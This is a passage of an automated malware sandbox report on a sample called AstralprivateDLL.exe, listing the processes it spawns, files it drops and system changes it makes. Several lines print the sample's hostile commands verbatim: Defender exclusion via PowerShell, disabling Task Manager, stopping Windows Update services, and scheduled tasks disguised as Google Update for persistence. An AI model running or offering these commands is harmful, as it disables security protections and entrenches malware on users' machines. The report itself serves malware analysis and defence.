                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC64BC3027_2_00000225DC64BC30
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC642CDC27_2_00000225DC642CDC
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AC165828_2_00000202C0AC1658
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0ABB23C28_2_00000202C0ABB23C
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0ABF2F828_2_00000202C0ABF2F8
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0ABB03028_2_00000202C0ABB030
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AB20DC28_2_00000202C0AB20DC
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AF225828_2_00000202C0AF2258
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AEBE3C28_2_00000202C0AEBE3C
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AEFEF828_2_00000202C0AEFEF8
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AEBC3028_2_00000202C0AEBC30
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AE2CDC28_2_00000202C0AE2CDC
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A6612DF2F830_2_000002A6612DF2F8
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A6612E165830_2_000002A6612E1658
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A6612DB23C30_2_000002A6612DB23C
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A6612DB03030_2_000002A6612DB030
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A6612D20DC30_2_000002A6612D20DC
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A66130FEF830_2_000002A66130FEF8
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A66131225830_2_000002A661312258
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A66130BE3C30_2_000002A66130BE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A66130BC3030_2_000002A66130BC30
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A661302CDC30_2_000002A661302CDC
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEF9165831_2_000002BAAEF91658
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEF8B23C31_2_000002BAAEF8B23C
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEF8F2F831_2_000002BAAEF8F2F8
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEF8B03031_2_000002BAAEF8B030
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEF820DC31_2_000002BAAEF820DC
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFC225831_2_000002BAAEFC2258
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFBBE3C31_2_000002BAAEFBBE3C
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFBFEF831_2_000002BAAEFBFEF8
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFBBC3031_2_000002BAAEFBBC30
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFB2CDC31_2_000002BAAEFB2CDC
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879920DC34_2_0000026A879920DC
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A8799B03034_2_0000026A8799B030
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A8799F2F834_2_0000026A8799F2F8
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A8799B23C34_2_0000026A8799B23C
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879A165834_2_0000026A879A1658
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879C2CDC34_2_0000026A879C2CDC
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879CBC3034_2_0000026A879CBC30
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879CFEF834_2_0000026A879CFEF8
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879CBE3C34_2_0000026A879CBE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879D225834_2_0000026A879D2258
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_000001795378165835_2_0000017953781658
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_000001795377B23C35_2_000001795377B23C
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537720DC35_2_00000179537720DC
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_000001795377B03035_2_000001795377B030
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_000001795377F2F835_2_000001795377F2F8
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537B225835_2_00000179537B2258
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537ABE3C35_2_00000179537ABE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537A2CDC35_2_00000179537A2CDC
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537ABC3035_2_00000179537ABC30
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537AFEF835_2_00000179537AFEF8
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D54165836_2_000002295D541658
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D53B23C36_2_000002295D53B23C
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D53F2F836_2_000002295D53F2F8
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D53B03036_2_000002295D53B030
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D5320DC36_2_000002295D5320DC
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D57225836_2_000002295D572258
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D56BE3C36_2_000002295D56BE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D56FEF836_2_000002295D56FEF8
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D56BC3036_2_000002295D56BC30
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D562CDC36_2_000002295D562CDC
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmp 4F698FB3C8100837ACB42BEE30B7B0C362BCF6D3C617880BEDC86E1D57C25D11
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: String function: 0017EB78 appears 39 times
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: String function: 0017F5F0 appears 31 times
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: String function: 0017EC50 appears 56 times
                                  Source: bcapgbqjwdsj.tmp.2.drStatic PE information: Resource name: DLL type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Source: IbBZTfZC.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: AvUrEmYP.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: qHqBUadh.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: gYWllyYA.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: QWRgRujm.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: OMvfRcDl.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: nWKkNNTp.log.13.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                  Source: updater.exe.2.drStatic PE information: Number of sections : 11 > 10
                                  Source: twain_32.exe.0.drStatic PE information: Number of sections : 11 > 10
                                  Source: AstralprivateDLL.exe.bin.exe, 00000000.00000003.1717902037.0000000003033000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs AstralprivateDLL.exe.bin.exe
                                  Source: AstralprivateDLL.exe.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  Source: ServerComponenthostMonitorDll.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: WmiPrvSE.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: WmiPrvSE.exe0.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: sihost.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: lsass.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: powershell.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.mine.winEXE@91/54@2/0
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_00166C74 GetLastError,FormatMessageW,1_2_00166C74
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B02328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,20_2_00007FF603B02328
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B01AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,20_2_00007FF603B01AC4
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,1_2_0017A6C2
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Users\user\Desktop\IbBZTfZC.logJump to behavior
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                  Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3720:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-iaIcn2RAvedg70EnUwKf
                                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_03
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCommand line argument: sfxname1_2_0017DF1E
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCommand line argument: sfxstime1_2_0017DF1E
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCommand line argument: STARTDLG1_2_0017DF1E
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: AstralprivateDLL.exe.bin.exeReversingLabs: Detection: 60%
                                  Source: AstralprivateDLL.exe.bin.exeVirustotal: Detection: 72%
                                  Source: unknownProcess created: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exe "C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exe"
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe "C:\Users\user\AppData\Local\Temp\Astral private DLL.exe"
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\twain_32.exe "C:\Users\user\AppData\Local\Temp\twain_32.exe"
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe"
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\containerperf\ServerComponenthostMonitorDll.exe "C:\containerperf/ServerComponenthostMonitorDll.exe"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
                                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\lsass.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF04D.tmp" "c:\Windows\System32\CSCC4EE3A879404710AD2E4883A563BED.TMP"
                                  Source: C:\Windows\System32\lsass.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\containerperf\lsass.exe'" /rl HIGHEST /f
                                  Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\dialer.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\Astral private DLL.exe "C:\Users\user\AppData\Local\Temp\Astral private DLL.exe" Jump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeProcess created: C:\Users\user\AppData\Local\Temp\twain_32.exe "C:\Users\user\AppData\Local\Temp\twain_32.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvcJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#amvyyojjq#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\containerperf\ServerComponenthostMonitorDll.exe "C:\containerperf/ServerComponenthostMonitorDll.exe"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvcJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvcJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauservJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bitsJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvcJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline"Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
